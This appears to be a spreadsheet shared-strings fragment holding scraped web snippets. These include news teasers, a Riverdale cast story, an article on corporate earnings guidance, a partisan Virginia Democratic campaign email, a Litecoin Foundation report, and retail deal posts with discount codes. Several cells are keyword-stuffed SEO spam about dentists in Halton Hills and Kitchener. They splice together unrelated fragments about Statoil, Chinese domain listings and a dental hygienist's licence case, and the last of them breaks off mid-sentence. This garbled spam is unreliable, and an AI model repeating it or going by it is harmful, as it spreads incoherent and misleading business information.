    <t>Remove Complaints CategoriesCategoriesSelect CategoryAbbotsfordAkronAlabamaAlaskaAlbanyAlbertaAlbuquerqueAnaheimAnchorageArizonaArkansasArticleAtlantaAtlantic CityAustinAustraliaBakersfieldBaliBaltimoreBaton RougeBellevilleBirminghamBoiseBombaBostonBoulderBramptonBridgeportBritish ColumbiaBuffaloBUSINESSCabo San LucasCalgaryCaliforniaCanadaCarolinaCelebritiesCharlestonCharlotteChathamCheatersChewbaccaChicagoChicoChilliwackCincinnatiClearwaterClevelandClown UnderColoradoColorado SpringsColumbiaColumbusComplain Against a serviceComplaint about ServiceComplaint Against a PersonComplaint Against A serviceConnecticutCoquitlamCornwallDallasDelewareDenverDetroitDirty ArmyDirty PollsDonald TrumpDubaiEdmontonEgyptEl PasoESCORTEUROPEFairfield CTFloridaFort St. JohnFort WayneFranceFreddy FagsFresnoFt. LauderdaleFt.WorthGeorgiaGermanyGossipGrand PrairieHalifaxHamiltonHartfordHawaiiHollywoodHonoluluHoustonHuntington BeachIllinoisIndianaIowaIrvineJacksonvilleJapanJersey CityKamloopsKansasKansas CityKanye ChestKearneyKelownaKentuckyKingstonKitchenerLas VegasLittle RockLondonLong IslandLos AngelesLouisianaMaineMalibuManchesterManhattanManitobaMarylandMassachusettsMedicine HatMelbourneMiamiMichiganMilwaukeeMinnesotaMinnesottaMissouriMontanaMonterreyMontrealMoose JawNaplesNashvilleNevadaNew BrunswickNew HampshireNew JerseyNew OrleansNew YorkNew ZealandNewport BeachNiagara FallsNigeriaNik RichieNorth CarolinaNorth DakotaNova ScoitaOaklandOhioOklahomaOklahoma CityOmahaOntarioOregonOregon State UniversityOrlandoOther ComplaintsOttawaOverdraftPenn State UniversityPennsylvaniaPensacolaPentictonPhiladelphiaPhoenixPittsburghPortlandPrince AlbertPrince GeorgeProvidenceQatarRed DeerReginaRenoRichmondRiversideRochesterSacramentoSaint PaulSalt Lake CitySan AntonioSan DiegoSan FransiscoSan JoseSarasotaSarniaSaskatoonScottsdaleSeattleSerbiaSouth BendSouth CarolinaSponsored PostSt. LouisStanfordStockholmSudburySurreySwedenSydneyTaiwanTampaTasmaniaTempaTempeTennesseeTestTexasThailandThe OfficeThicknessThunder BayTokyoTorontoTucsonTulsaTURKEYUkraineUncategorizedUnited KingdomUnited StatesUtahVancouverVencouverVermontVernonVictoriaVirginiaWashingtonWashington D.C.West CovinaWest Palm BeachWest VirginiaWichitaWicked TunaWindsorWinnipegWisconsinWyomingYuma The post PayPal.com — Worst Customer Service appeared first on Cheater Xposed - Cheater Exposed USA.</t>
  </si>
  <si>
    <t>A man who admitted fleeing the dock of Dundee Sheriff Court has avoided a prison sentence.</t>
  </si>
  <si>
    <t>Roanoke Virginia Credit Repair | (888) 630-5917 Roanoke Virginia Free Credit Repair Counseling call (888) 630-5917 remove bankruptcy, free consumer report, fix bad credit, check your annual Equifax, TransUnion, Experian credit report. 7 ESG ETFs to Buy for Responsible Profits"I want to make sure that my money isn't doing... Friday 11 October 2019 05:20 AM UTC-05 7 ESG ETFs to Buy for Responsible Profits "I want to make sure that my money isn't doing harm," Tina Lopes, a mother of three, told the CBC. "I don't want to profit from companies, …</t>
  </si>
  <si>
    <t>AN ASTEROID seven times bigger than the Great Pyramid of Giza is flying towards our planet, space agency NASA has confirmed. The post Asteroid alert: NASA tracks an asteroid seven times bigger than Pyramids on close approach appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>I joined Innovation Africa’s www.innoafrica.org volunteer trip to Uganda. Innovation Africa is an Israeli based organization that builds solar-powered water wells for African tribes who have no access to water. See more at www.kdalive.com source The post Voluntourism: Innovation Africa Volunteer Trip to Uganda appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Norwegian Spanish Dictionary – travel dictionary to translate Norwegian to Spanish. Click on the list to show Norwegian or Spanish synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Norwegian Spanish Dictionary →</t>
  </si>
  <si>
    <t>If it’s Friday, it must be Flip-A-District Friday, courtesy of Del. Rip Sullivan’s Project Blue Dominion. This week, the focus is on a “quick overview of the GOP strategy to hold the House and Senate,” which is basically “pretending to be moderates, they have never heard of “President Trump,” and they would appreciate it very much if you wouldn’t bring up their voting record…” Flip-A-District Friday: Volume XVII Welcome to this week’s issue of our “Flip-a-District” series, where we are going to do a quick overview of the GOP strategy to hold the House and Senate. In January, Richmond Times-Dispatch columnist Jeff Shapiro previewed their approach in an op-ed titled: “Looking for a win, Republicans try something different: looking like Democrats.” After refusing to listen to Virginians for years on important issues like gun safety and health care, Republicans are trying to pretend that they were fighting the good fight all along. It’s a deeply desperate strategy given that voters — even those who don’t pay close attention to state politics — have long memories and are unlikely to forget which party stands where on the issues they care about most. Yet here we are. Republicans are pretending to be moderates, they have never heard of “President Trump,” and they would appreciate it very much if you wouldn’t bring up their voting record… “Republican Party? Never heard of it.” One of the simplest ways Republicans are trying to hide their true colors is by doing just that — hiding the fact that they are running as members of the GOP, often by eschewing traditionally Republican red colors in favor of more benign shades like green or even blue. Here are a few examples of these confusing, uninformative signs. You’ll notice a couple of interesting details. Republican Shannon Kane’s sign implies that she is already a delegate — she is not, and her opponent is incumbent Delegate Kelly Fowler (D). Below is a photograph with signs including those of Republican House of Delegates candidates DJ Jordan, Heather Mitchell, and Rich Anderson. Their signs are remarkably scrubbed of any party affiliation, and Mitchell’s even comes close to copying the same misleading technique that Shannon Kane uses to try to give the impression that she is the incumbent Delegate. Some Republicans have gone so far as refusing to mention their party affiliation anywhere so voters have to do the extra work. From Mary Margaret Kastelberg (running against Rodney Willett in HD-73) to Forrest Hite (running against Delegate Chris Hurst in HD-12), Republicans in competitive districts are simply unable to make the case that they could better represent the area than Democrats, instead creating websites, publishing grip cards, and giving interviews completely devoid of substance. Several GOP candidates seem so terrified of the issues where the parties split that they can only squeak out a few bland talking points like “I believe that every child deserves the opportunity to receive a high-quality education” and “people want solutions and leadership.” Talking points come with the political territory, but when a candidate’s literature and website are all statements that everyone can agree on, it’s unhelpful and sometimes even misleading to voters. Luckily, Democrats have been able to make clear distinctions between our candidates and Republicans when talking to Virginians. The Republicans’ attempts to misdirect and confuse will not work. “Medicaid expansion? You’re welcome.” There are few issues that come with longer voting records for incumbents than Medicaid expansion. After the Affordable Care Act gave states the opportunity to expand this life-saving program, Democrats tried year after year to provide coverage to what was estimated to be about 400,000 people in Virginia. Republicans, in turn, voted year after year and are on the record — all of them — opposing it. The GOP ignored data from other states that had successfully expanded the program and instead spread misinformation about looming tax hikes and rationed care. The 2017 elections, which netted Democrats an additional 15 seats in the House, paired with extensive polling on the subject showed how popular the Democratic priority of expansion was to Virginians. Only after years of intransigence and “nay” votes did a tiny handful of Republicans finally agree to let Medicaid expand in Virginia. Republican lawmakers who got out of the way at the last minute are now, infuriatingly, trying to take credit for expansion. It’s as if a handful of people sitting on train tracks jumped off at the last minute to let the train pass and now want credit for the train arriving at the station. The worst offender here is Chris Jones (R), whom we discussed in Volume IX. Jones blocked expansion for years as the powerful Chairman of the Appropriations Committee until it became an untenable, clearly unpopular position. Jones is now running ads on television claiming that he “led the fight to expand Medicaid.” This comes after “the Washington Post…recognized him as ‘a leader in the fight against Medicaid expansion’ as he fought to remove Medicaid expansion from a 2014 budget.” This kind of misleading ad from Jones’ campaign is exactly the kind of tactic that Shapiro predicted — Republicans running as Democrats — but it doesn’t make it any less bizarre. Hopefully voters won’t be fooled, and will see through his diversion on November 5. “Gun safety? All for it! For now.” It’s a toss up as to whether this or the previous issue is more frustrating. Like Jones and his last-minute turn on Medicaid expansion, a handful of embattled Republicans are shockingly trying to claim that they support gun safety reform. Unlike Medicaid expansion, however, the GOP in Virginia has steadfastly refused to budge on this issue yet. First, a quick rundown of what happened this year: first, all gun safety legislation was swiftly killed by the Republican-led Militia, Police, and Public Safety Committee so that no Republicans in tough districts would have to choose between the NRA and the preferences of the vast majority of Virginians. After the regular session concluded, Governor Ralph Northam called for a Special Session of the General Assembly to tackle gun violence after the shooting in Virginia Beach. At the Special Session, Republicans refused to hold any votes or allow any debate, instead kicking all bills to the Crime Commission “for review.” In a truly crass political move, Republican leadership insisted that any votes on gun safety would have to wait until after the November 5th elections. Republicans — every one of them — all backed leadership and went along happily with the plan to kill all hope of gun safety reform before November. Lives are on the line, but that appears to matter less to Republicans than being able to bring in money from the NRA ($200,000 on September 3rd to Speaker Cox’s leadership PAC) and turn out the most extreme members of their base. Shockingly, a few Republican members are now pretending to have been champions for gun safety all along. Tim Hugo, who has a solid “A” rating from the NRA, recently claimed to have “consistently voted” for gun safety bills. He claims to support red flag laws now. As the patron of the only red flag law proposal in the Virginia House, I can assure you that I have never heard a word of support from Tim Hugo, who has used his position as the Republican Caucus Chair to make other Republican Delegates toe the NRA line. The bill he and others now claim to support is NOT a red flag bill. This very recent faux epiphany on gun safety is not surprising, though it is a baldly political move — Hugo is facing Democrat Dan Helmer on November 5th and Helmer is running an excellent, well-funded, grassroots campaign. The same can be said for Republicans like David Yancey and Glenn Davis, who have both now claimed to support a red flag bill and have made faint gestures in the direction of supporting extremely limited gun safety legislation only after being faced by determined Democrats on the campaign trail. Their sudden, supposed about-face on gun safety is a sign of desperation, not leadership, and their voting records and years of complacency speak louder than last-ditch fake positions. That’s it for Volume XVII and for this year’s Flip-a-District series. I encourage you to review this email and past editions to find a candidate or candidates whom you would like to support with your time or financial resources. It’s now or never. Best, CLICK HERE TO CONTRIBUTE TO BLUE DOMINION PAC</t>
  </si>
  <si>
    <t>The NSW government's decision to fast-track the construction of dams overlooks the absence of one essential element, water.</t>
  </si>
  <si>
    <t>The AFL’s silly season has come and gone and despite days going by with nothing happening, the end of the trade period saw a flurry of moves.</t>
  </si>
  <si>
    <t>A new Gartner survey finds chief marketers remain positive about their budgets, despite negative economic headwinds. Read More</t>
  </si>
  <si>
    <t>daveoi</t>
  </si>
  <si>
    <t>Hey guys! We've got selected men's chinos reduced to 2 for $69 - We've got Skinny, Tapered and Jogger fits. You can also match these with any other product in our 2 for $69 promotion (shorts, shirts, polos) if you don't want two pairs! This promo is eligible for free delivery with DHL. (This promo is not available in our AU branches) If you have any questions please let me know! Cheers! Daveoi</t>
  </si>
  <si>
    <t>Most Popular Dental Clinic In Halton Hills At nights she would carry a ‘ boozaye’ (home-made kerosene lighted torch) and during inclement weather, she would either. Locate and compare Clinics Medical in Halton Hills ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are. Most Popular Open now 24/7 Online Messaging Rate The Committee of Adjustment is a committee, made up of Hamilton residents chosen by City Council that deals with consents and minor variances. A consent is often referred to as a land severance. The most common types of consent applications are for land severance to divide a parcel of land into two or more new lots or as a lot addition to an. 2019-10-02 · Sarnia Observer – a place for remembering loved ones; a space for sharing memories, life stories, milestones, to express condolences, and celebrate life of your loved ones. Best Dentists in Georgetown, Halton Hills, ON – Dentistry On Sinclair, Still Waters Dental Group, Sunnyview Dental – Georgetown, Downtown Georgetown Dental, Market Place Dental Centre, King's Cove Family Dental, Young Dentistry, Oksana M. Friendliest Dental Clinic In Halton Hills Ontario KARAS DENTAL CLINIC, Dentist in Halton Hills, Ontario, 308 Guelph Street, Halton Hills, ON L7G 4B1 – Hours of Operation &amp; Customer Reviews. Add a company Share Share Tweet KARAS DENTAL CLINIC Canada Ontario Halton Hills KARAS DENTAL. . Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Homes for sale with Any price. 1910 Lake Shore Blvd W Unit 1506, Toronto W01, ON M6S 1A2 Kid Friendly Dental Clinic In Halton Hills Best Cosmetic Dentists in Halton Hills, ON – Downtown Georgetown Dental, Sunnyview Dental – Georgetown, Market Place Dental Centre, Pownall Janet, DDs – Still Waters Dental, King’s Cove Family Dental, Apple Dental, Still Waters Dental Group, Kid Friendly Dental Clinic In Halton Hills. 为您提供与 pleasant 相关的域名和网站信息，帮助您从域名应用的角度更好的了解域名是如何被使用的，为您使用域名提供参考依据。 Best General Dentistry in Halton Hills, ON – Dentistry Welcome to Marketplace Dental Centre, one of best dental Clinics in Georgetown, Ontario. Dr. Anoop Sayal and Associates have been proudly serving Georgetown and Halton Hills since 1994 and we warmly welcome you to join our family of patients. We. Statoil is an international energy company with operations in 34 countries. Building on more than 35 years of experience from oil and gas production on the Norwegian continental shelf, we are committed to accommodating the world’s energy needs in a responsible manner, applying technology and creating innovative business solutions. Preferred Dental Clinic Near Halton Hills Best Dentists in Georgetown, Halton Hills, ON – South Georgetown Dental Care, Georgetown. Mill Dental, Highest Rated Dentist Near Halton Hills Most Popular Dentist Near Halton Hills Ontario Find the. Denture Clinic in Halton Hills ON (122 Result(s)) Relevance Closest Highest rated Most reviewed Alphabetical Recently Reviewed Filters. We provide complete dental services for your entire family. We also feature new patient exams, emerg. . . Market Place Dental Centre, Young Dentistry, Mill Dental, Highest Rated Dentist Near Halton Hills Most Popular Dentist Near Halton Hills. Admire Dental is a renowned dental care clinic that offers a range of friendly, caring and affordable dental services to its patients. Visit the website for more.</t>
  </si>
  <si>
    <t>Our new retirees is ushering in a new era, heeding two decades of advice and building their nest eggs to be self-funded in retirement</t>
  </si>
  <si>
    <t>The Herald's View</t>
  </si>
  <si>
    <t>Rivalry between states cannot be an excuse for not protecting thoroughbred horses in retirement.</t>
  </si>
  <si>
    <t>Able Magazine</t>
  </si>
  <si>
    <t>Born Anxious is a homegrown clothing label set up by Kellie Barker, mother of Oscar, an autistic child living in Herne Bay, Kent. Kellie set up the clothing label in 2018 with two main objectives, which were to make the clothes as comfortable as possible, whilst also remaining planet friendly and to hold important information […] The post Clothing Label set to help children and adults with Autism appeared first on Able Magazine.</t>
  </si>
  <si>
    <t>Care Quality Commission annual state of care report found emergency care standards have slipped over the past year</t>
  </si>
  <si>
    <t>The Living Room this week sees Chris Brown stargazing in Warrumbungle National Park, home to Siding Springs Observatory, and Miguel’s killer ‘special sauce.’ Ariba. Gardens with Matt Leacy: MECA Garden The Mount Druitt Ethnic Community Agency (MECA) provide vital services to refugees who have just arrived in Australia. From English lessons, to helping find employment and accommodation, MECA helps new families find their feet and feel at home. Barry and Amanda think MECA’s outdoor space need to be as top notch as their work, so call on Matt Leacy to breath some life into their uninspiring garden. Travel with Chris Brown: Dark Park Milky Way Chris heads to Warrumbungle National Park for some stargazing. As Australia’s first designated International Dark Sky Park, the nocturnal environment is protected by limiting artificial light in the area. It’s also home to Siding Springs Observatory, the country’s premier astronomical observatory. It seems like Chris has all the right ingredients for a stunning Milky Way snap. Food with Miguel Maestre: Cornslaw Quickie Miguel shares the perfect side dish to take to the sea of BBQ’s that are headed your way this summer. Using a handful of ingredients and a killer ‘special sauce’ Miguel makes a mouth-watering Cornslaw in next to no time. Renovations with Barry Du Bois: Reno Top Tips With a long weekend around the corner, there’s no better time to tackle those DIY projects. Barry shares his top three tips to turn first time renovators into pros. 7:30pm Friday on 10.</t>
  </si>
  <si>
    <t>Riverdale first introduced the character of Ricky DeSantos (played by Nico Bustamante) in the third season of the popular show. He was involved in the dramatic subplot featuring the Gargoyle gang, which put both Archie (played by KJ Apa) and Jughead (Cole Sprouse) in danger. But after he was left tied up in the forest, fans have been wondering whether he will be back again. Will Ricky return in Riverdale season 4? Riverdale returns to screens next week on both The CW and Netflix. Airing for US viewers on October 9, fans of the show will be able to catch the latest episode on The CW. For those in the UK, Riverdale will be available the day after on Thursday, October 10 on Netflix. In the lead up to the new outing, fans have been keen to work out what will be next for the High School seniors. READ MORE: Riverdale season 4 Netflix release date, cast, trailer, plot One storyline hoped to be picked up is the fate of Ricky DeSantos, who viewers were first introduced to in season three. Ricky was first found hiding in the gym by Archie and Josie (Ashleigh Murray) before he revealed a bit more about his backstory. A runaway, he ends up going to stay with Archie for a period of time while they work out who he really is from the Santa Lucia Shelter. Later in the series it is revealed that Ricky is Joaquin’s (Rob Raco) younger brother. READ MORE: Riverdale season 4: What happened to the Farm? Will the cult return? This all leads to a tense stand-off where Ricky plans to kill Archie in order to get protection from the gang called the Gargoyles. Viewers will remember that he couldn’t go through with this and is later seen luring Jellybean (Trinity Likins) into the forest to meet the Gargoyle King. He was stopped by Jughead who Ricky then orders his fellow gang members to attack. However, the last time that he appeared in the show, Ricky was left tied up in the forest. While Jughead luckily escapes, some fans have been wondering what happened next to the young runaway. READ MORE: Riverdale: Will KJ Apa quit after shock confession? The CW has not officially revealed that Ricky will be back for the new season. However, the actor Nico Bustamante confirmed he was involved in filming for the latest outing on Instagram. Posting an image of him in costume, he wrote: “Can’t wait for S4 of Riverdale. “First episode is dedicated to the beloved Luke. But everyone, kick back and enjoy some popcorn because S4 is gonna be good.” The young actor has also posted a number of images of him filming for season four in Vancouver over the last few months. READ MORE: Riverdale season 4 spoilers: Is Hiram Lodge set for a huge revenge? This includes images with Skeet Ulrich who plays FP Jones in the show and another of him in the forest where viewers last saw him in season four. Bustamante is best known for his appearance in Riverdale, but he has also appeared in a number of other hit shows, including Gotham as an Orphan and in films like Gotti and Bel Canto. From the trailer for the latest season, it seems like much of the fourth outing could be focused on the myserteous disappearance of Jughead. Whether or not Ricky and the Gargoyle gang have any involvement in this will all be revealed when the show finally returns. Riverdale season 4 starts on October 10 on Netflix Source link</t>
  </si>
  <si>
    <t>A 27-year-old man is facing a second-degree murder charge in connection to Regina's fourth homicide of 2019.</t>
  </si>
  <si>
    <t>googleyahoo69</t>
  </si>
  <si>
    <t>Original Coupon Deal Product information https://infasecure.com.au/collections/convertible-booster-se... One of the better rated front facing seat by CREP if anyone cares. - Model Number: CS7113CP2 - Rating: 4.7/5.0 $169 via Baby Bunting's own website https://www.babybunting.com.au/product/infasecure-comfi-capr...</t>
  </si>
  <si>
    <t>The Ecosystem of Litecoin Has Been Affected By Many FUD Lately Litecoin Foundation Has Strong Believers and Money Will Not be the Problem – Wang Litecoin News Today – Xinxi Wang – the co-founder of the Litecoin Foundation – recently took to Twitter to resolve the controversy that has been circulating online since the financial audit of the Foundation was released. Litecoin Foundation’s financial audit data posted by u/Toyake – a Reddit user. The user posted a screenshot of the financial audit and the screenshot apparently showed “almost depleted in funds” in the first quarter of this year. The published document revealed that the Litecoin Foundation got most of its income from merchandise sales, donations, and the forthcoming Litecoin Summit. The Litecoin Summit would take place in the next two weeks. There was a significant drop in donation numbers and Wang has attributed that fall to the stagnation in the market. Litecoin (LTC) Price Today – LTC / USD The Ecosystem of Litecoin Has Been Affected By FUD Lately The ecosystem of Litecoin has been affected by a lot of FUD (fear, uncertainty, and doubt) lately. This is mainly because the price of the digital currency failed to surge higher after the much-anticipated halving. The Litecoin Foundation came into existence back in 2017, six years after Litecoin came on board. Since the emergence of the Foundation, it has received a lot of strong criticisms. Most of the criticisms are directed towards inefficiencies over the balance of the business and how it is managed. Via a tweet, A Board Director of the Litecoin Foundation – Wang – said: “We will do more if we have more money and do less with less money. We did not have a business model. And we have been trying to figure out ways to generate revenue to be self-sustaining. Let us know if you can help.” Litecoin Foundation Has Strong Believers and Money Will Not be the Problem – Wang In his tweet, the Litecoin co-founder said that irrespective of the fact that he is not being paid, the Litecoin Foundation has very strong believers and that money will not be a problem, as the team has a plan. The community has been trying to stir up conflict. However, the Managing Director of the Litecoin Foundation and Litecoin Founder – Charles Lee – has put the notion that the Foundation is wasting all the money on sponsorships to rest. In the post, Lee said that the Foundation would release the latest financial records. He also clarified that the Litecoin Foundation has not paid a dime towards any sponsorships. In addition, Wang refuted speculations of a non-public deal worth $2.8 million with WEG bank. Princess Ogono is a writer, lawyer and fitness enthusiast. She believes cryptocurrencies are the future. When she’s not writing, she spends time with her adorable cat, Ginger and works out often.</t>
  </si>
  <si>
    <t>10 Podcasts That Can Help You Power Through Your Next Workout – Laskafitness Original Source We love a good workout playlist as much as the next person, but if you feel like you’ve already shuffled through every song on Spotify at least a hundred times, you might try switching things up the next time you hit the gym. Podcasts are a great way to pass the time, whether you’re commuting to work or trying to burn off some extra calories, and there are so many shows available to suit your interests. Whether you find yourself struggling to stay motivated on the treadmill, or you just want to learn something while you work out, you’ll find your perfect podcast in this list. #mc_embed_signupbackground:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; /* Add your own Mailchimp form style overrides in your site stylesheet or in this style block. We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */ The post 10 Podcasts That Can Help You Power Through Your Next Workout – Laskafitness appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Vice chancellors have defended the ATAR amid claims it stresses out students and needs an overhaul</t>
  </si>
  <si>
    <t>A US court has ordered President Donald Trump to produce his tax returns for a New York state criminal probe. A federal judge rejected Mr Trump's challenge to the release of the documents. Mr Trump's legal team believed the investigation was politically motivated and said the quest for his tax returns should stop as he is immune from any criminal probe while in the top job. Image: AP</t>
  </si>
  <si>
    <t>AlishaGrant</t>
  </si>
  <si>
    <t>(20%Off) Rechargeable Battery Wireless Security Camera Original Price :$89.99 Deal Price:$ 71.99 Discount code :8GTR8GE5 Link: https://www.amazon.com.au/dp/B07SL21VNQ (30% off) 3 Types of Wireless 1080p Outdoor Bullet Wi-Fi Security Camera Original Price:$69.99 Deal Price:$48.99 Type1: https://www.amazon.com.au/dp/B07PCN34FF Type2: https://www.amazon.com.au/dp/B07SKG8143 Type3: https://www.amazon.com.au/dp/B07SQTCZYH Please use the same code : 7IRPXIFB to get30%off (30% off) 2 Types of 1080p Indoor Home Wi-Fi Security Camera - Black&amp;White Original Price:$59.99-$69.99 1080p： https://www.amazon.com.au/dp/B0772PDYVW (Deal Price:$41.99) 1080p works with Alexa&amp;Smart tracking&amp;Sound and face detection: https://www.amazon.com.au/dp/B078RLWCMY (Deal price:$48.99) These deals use the same code : DWJ5PE5O to get 30%off (30%off) 1080p Home Security Camera - White (only 3 pcs left) Original Price:$55.99 Deal Price:$39.19 Discount Code:DRO63B8O Link1: https://www.amazon.com.au/dp/B07TWVT136 Link2: https://www.amazon.com.au/dp/B01DP38ZHI (30%off)Fake/Dummy Outdoor Bullet Camera Original Price:$12.99 Deal Price:$9.09 Discount Code:RM566SXR Link: https://www.amazon.com.au/dp/B07CMY6ZVC (30% off) 1080p Home Security Camera great as baby pet monitor - Hot item Original Price:$57.99 Deal Price:$40.59 Discount Code:3NPT54QK Link: https://www.amazon.com.au/dp/B012VJK3OK (20%-30% Off) Security Camera System Set deals: [30% off] 4 x 1080MP Wireless WIFI Security Camera System with NVR Original price :$266.99 Deal price:$186.89 Discount Code: BXHO7AIZ Link： https://www.amazon.com.au/dp/B077YTTCVD (30%off) 4×2MP HD Wireless Security Camera System with NVR Original price :$279.99 Deal price:$195.99 Discount Code:97N876M8 Link: https://www.amazon.com.au/dp/B07PBT8K47 (25% off) 4×1080p Wireless Home Security Camera with NVR Original price :$299.99 Deal price:$224.99 Discount Code: FGCX8Y7O Type : https://www.amazon.com.au/dp/B07VTTSYXV (20% off) 8×2MP HD Home Surveillance Wireless Cameras set with 8 Channel NVR Original price :$399.99 Deal price:$319.99 Discount Code: 43FI6LBK Link: https://www.amazon.com.au/dp/B07Q2S5XW3 (20% off) 1080p HD PoE Home Security Camera System with NVR Original Price:$329.99 Deal Price:$263.99 Discount Code: PSCSUMXB Link: https://www.amazon.com.au/dp/B07RXN9JHW (25% off）3MP-4MP Home Security Camera Deals: 3MP Home Security Camera Original Price:$89.99 Deal Price:$67.49 Discount Code: ZDD88FGQ Link: https://www.amazon.com.au/dp/B07QSCVYV2 (25% off) 4MP Outdoor Security Camera Original Price:$99.99 Deal Price:$74.99 Discount Code: GJ754OJF Link: https://www.amazon.com.au/dp/B07SV5KZB3 (20% off) 1080p Wireless Hidden Mini Cameras Home Security Spy Camera Original Price :$55.99 Deal Price:$44.79 Use Same Discount code : 34XGPIZX Type 1: https://www.amazon.com.au/dp/B07VMF3J63 Type 2: https://www.amazon.com.au/dp/B07VKSV42J (20% Off) 1080p PoE camera Deals: Original Price:$59.99 Deal Price:$47.99 Discount Code: 8QJ8ML5B Link 1: https://www.amazon.com.au/dp/B07F2SXY3K Link 2: https://www.amazon.com.au/dp/B07F2W8NP1 (20% Off) 4MP PoE camera deal: Original Price:$89.99 Deal Price:$71.99 Discount Code: 8QJ8ML5B Link: https://www.amazon.com.au/dp/B07S5ZQ34Y Deal all,Please let me know if you are interested in other products in my store ,I will try to apply a discount to you. If any code can't work for you ,let me know.Thanks</t>
  </si>
  <si>
    <t>Wall Street’s eternally optimistic forecasters are expecting corporate profit growth to surge by the middle of next year — views that are about to collide with reality as hundreds of companies report financial results and update investors on their prospects. American companies go through this ritual every three months: sharing financial statements and holding conference calls in which they sometimes offer their expectations for future quarters, what Wall Street calls “guidance.” For this quarter, it begins with reports from several big banks on Tuesday. In between these reports, executives continue to issue guidance, trying to nudge expectations higher or lower with speeches at conferences or other events so official results don’t jolt investors. Lately, they’ve been doing less of the in-between nudging, and that could make this round of earnings reports more important than usual. “Companies are starting to do what they do when there is rampant uncertainty, which is just stop issuing guidance,” said Savita Subramanian, head of United States equity strategy at Bank of America Merrill Lynch. “Companies just basically go dark.” During the three months that ended in September, companies in the S&amp;P 500 offered the fewest updates — positive or negative — to investors since 2000, according to the bank’s analysts. The “rampant uncertainty” that Ms. Subramanian referred to flows from many sources: signs that the economy and job growth are slowing, evidence that the manufacturing sector may already be in a recession, and the trade war’s toll on China, Japan and Germany. Plus, politics and the 2020 presidential election were always going to be a distraction, but the impeachment investigation has made it harder to know where policy will go. On Friday, President Trump said the United States and China had reached an interim deal to avert a planned tariff increase on Tuesday. But the agreement was spoken and would take several weeks to write, doing little to remove the uncertainty surrounding the economic battle between Beijing and Washington. Regardless of the companies’ reasons, the relative silence since their last reports means stock investors may be in for a lot of bad news all at once. Then there’s the matter of the habitually overenthusiastic Wall Street analysts who rate stocks and try to predict where they’re heading. Stock prices hinge on expectations — not on what just happened — and the predictions look increasingly divorced from reality. Right now, the collective forecast is that profits at S&amp;P 500 companies will jump more than 10 percent in 2020, a view that defies expectations for the economy to slow further. “It doesn’t look likely,” said Ralph Davidson, chief global equity strategist at BTG Pactual, a Brazilian investment bank, of the profit forecast. “We expect guidance to be coming down.” It’s not that double-digit profit growth is unprecedented. In 2018, earnings jumped 22 percent after a sharp cut in corporate taxes. But it’s becoming clear that last year’s surge was a one-time jolt. The current year offers an example of what may happen if it dawns on analysts that they’re being too rosy. Last October, they were forecasting that profits would grow about 10 percent in 2019. Those targets came down fast at the end of the year because of sudden worry that the trade war and rising interest rates might tip the economy into a recession. As the year progressed, and companies reported results, the analysts cut the forecast down, again and again. Now, they expect that profits will have grown just under 2 percent once the year is done. For the third quarter, which ended in September, analysts expect S&amp;P 500 companies to report that their profits fell 3 percent. Lower profits aren’t necessarily bad news for the economy. One reason corporate earnings have been pinched is that wages have been rising. That reflects the strong job market and helps support consumer spending, which is the bedrock for economic growth in the United States. Nor does a slowdown in profits definitely mean stocks will fall. The key reason that stocks haven’t done worse as growth targets have been reduced is the Federal Reserve’s decision to cut interest rates. The central bank made its first cut in July and, most recently, announced that it would expand its balance sheet, a process that pumps money into financial markets. All of this has been good for stocks. But eventually investors will have to turn their attention back to the fundamental question of whether profits are going to keep growing, and how fast. And that could make the next few weeks rocky. “I think we’re going to see a wave of negative guidance on next year’s earnings,” said Ms. Subramanian of Bank of America. “And that might not be great for the market.” Source link</t>
  </si>
  <si>
    <t>STOMACH pain and bloating often occur after eating, particularly after drinking fizzy drinks or eating foods that are hard to digest. But in some cases these can be symptoms of more serious conditions – one being gastroparesis. Daily Express :: Life and Style Feed</t>
  </si>
  <si>
    <t>Daisy Pearce is confident that fresh talks between the AFLPA and AFLW players will produce a result that allows the 2020 season to go ahead as planned.</t>
  </si>
  <si>
    <t>Austrian author and playwright Peter Handke is awarded the Nobel Prize in Literature for 2019, with the postponed 2018 prize going to Polish writer Olga Tokarczuk.</t>
  </si>
  <si>
    <t>savemesomemoney</t>
  </si>
  <si>
    <t>This usually is listed for $69. Take note that this is the basic edition and not the 4k one which we still don't have here in Australia. A good reason to get this is if you want Amazon Prime Video and you don't like manually putting apps on your media device.</t>
  </si>
  <si>
    <t>Auxiliary data. src/public/js/zxcvbn.js This package implements a content management system with security features by default. It provides a blog engine and a framework for Web application development. Its features include: – Digitally signed automatic security updates – The community is always in control of any add-ons it produces – Supports a multi-site architecture out of the box – Designed. KITCHENER, Ontario – A Canadian man who worked as a dental hygienist said his license was revoked for five years and he was. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. ‘I just want it to end’: Dental hygienist who lost license for treating his wife speaks out – KITCHENER – A former Guelph dental hygienist. into his conduct following a complaint to the College of Dental Hygienists. Dental hygienist deemed ‘sex abuser’ for cleaning wife’s teeth awaits law exemption – "The ministry is aware that the College of Dental Hygienists of Ontario has submitted a proposed. wife’s teeth because of. The OCS was the only way to legally buy recreational pot in Ontario until April 1, when the province’s first. the Ontario government said it was limiting the number of initial retail licences. Kid Friendly Dental Clinic Near Kitchener Ontario Mo. Best Dentist in Kitchener No Widgets found in the Sidebar Alt! No Widgets found in the Sidebar Alt! Dentist Cosmetic Dentist Near Kitchener February 1, 2019 The dental implants and prosthetics market is anticipated to grow with a significant. KITCHENER – A new survey finds that newcomers. "Almost 50 per cent of new immigrants are choosing Ontario to be their. . has a 4.8 rating. I'm new to Waterloo and had this office recommended. It exceeded my expectations and I had a great experience. Everyone was so friendly and appointments were right on time. Dr. Morrison has been our family dentist. Murdoch Mysteries is a Canadian detective series set in late nineteenth- and early twentieth-century Toronto, based on a series of novels by Maureen Jennings.The series centers around 